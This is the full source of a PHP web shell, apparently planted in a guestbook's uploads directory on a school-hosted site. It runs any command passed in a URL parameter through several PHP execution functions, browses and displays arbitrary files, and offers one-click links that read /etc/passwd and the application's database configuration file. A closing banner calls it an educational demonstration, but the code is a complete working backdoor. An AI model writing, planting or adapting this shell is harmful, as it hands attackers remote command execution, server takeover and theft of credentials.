Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads
<?php
// Advanced PHP shell for demonstration
echo "<h1 style='background: black; color: lime; padding: 10px;'>🐚 WEB SHELL ACTIVATED</h1>";
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
echo "<h2>Executing: " . htmlspecialchars($cmd) . "</h2>";
echo "<pre style='background: #000; color: #0f0; padding: 10px; border-radius: 5px;'>";
// Try different command execution methods
if (function_exists('system')) {
system($cmd);
} elseif (function_exists('exec')) {
exec($cmd, $output);
echo implode("\n", $output);
} elseif (function_exists('shell_exec')) {
echo shell_exec($cmd);
} elseif (function_exists('passthru')) {
passthru($cmd);
} else {
echo "No command execution functions available.";
}
echo "</pre>";
}
// File browser
echo "<h2>📁 File Browser</h2>";
$dir = isset($_GET['dir']) ? $_GET['dir'] : '.';
$files = scandir($dir);
echo "<p>Current directory: <code>" . realpath($dir) . "</code></p>";
echo "<div style='background: #f5f5f5; padding: 10px; border-radius: 5px;'>";
foreach ($files as $file) {
if ($file === '.') continue;
$fullPath = $dir . '/' . $file;
if (is_dir($fullPath)) {
echo "📁 <a href='?dir=" . urlencode($fullPath) . "'>" . htmlspecialchars($file) . "</a><br>";
} else {
echo "📄 " . htmlspecialchars($file);
if (is_readable($fullPath)) {
echo " <a href='?view=" . urlencode($fullPath) . "'>[view]</a>";
}
echo "<br>";
}
}
echo "</div>";
// File viewer
if (isset($_GET['view'])) {
$file = $_GET['view'];
if (is_readable($file)) {
echo "<h2>📄 Viewing: " . htmlspecialchars($file) . "</h2>";
echo "<pre style='background: #f9f9f9; padding: 10px; border: 1px solid #ddd; max-height: 400px; overflow: auto;'>";
echo htmlspecialchars(file_get_contents($file));
echo "</pre>";
}
}
?>
<h2>🎯 Available Actions</h2>
<div style="background: #e9ecef; padding: 15px; border-radius: 8px;">
<h3>Command Execution:</h3>
<form>
<input type="text" name="cmd" placeholder="Enter command (e.g., ls, whoami, pwd)" style="width: 300px; padding: 5px;">
<button type="submit">Execute</button>
</form>
<h3>Quick Commands:</h3>
<a href="?cmd=ls -la">📋 List files</a> |
<a href="?cmd=whoami">👤 Show user</a> |
<a href="?cmd=pwd">📍 Show directory</a> |
<a href="?cmd=ps aux">🔄 Show processes</a> |
<a href="?cmd=cat /etc/passwd">🔐 Show users</a>
<h3>File Operations:</h3>
<a href="?dir=..">⬆️ Parent directory</a> |
<a href="?dir=/">🏠 Root directory</a> |
<a href="?view=../config/Database.php">🔍 View DB config</a>
</div>
<div style="margin-top: 20px; padding: 10px; background: #fff3cd; border-radius: 5px;">
<strong>⚠️ Educational Warning:</strong> This demonstrates a web shell vulnerability.
In a real attack, this could allow complete server compromise!
</div>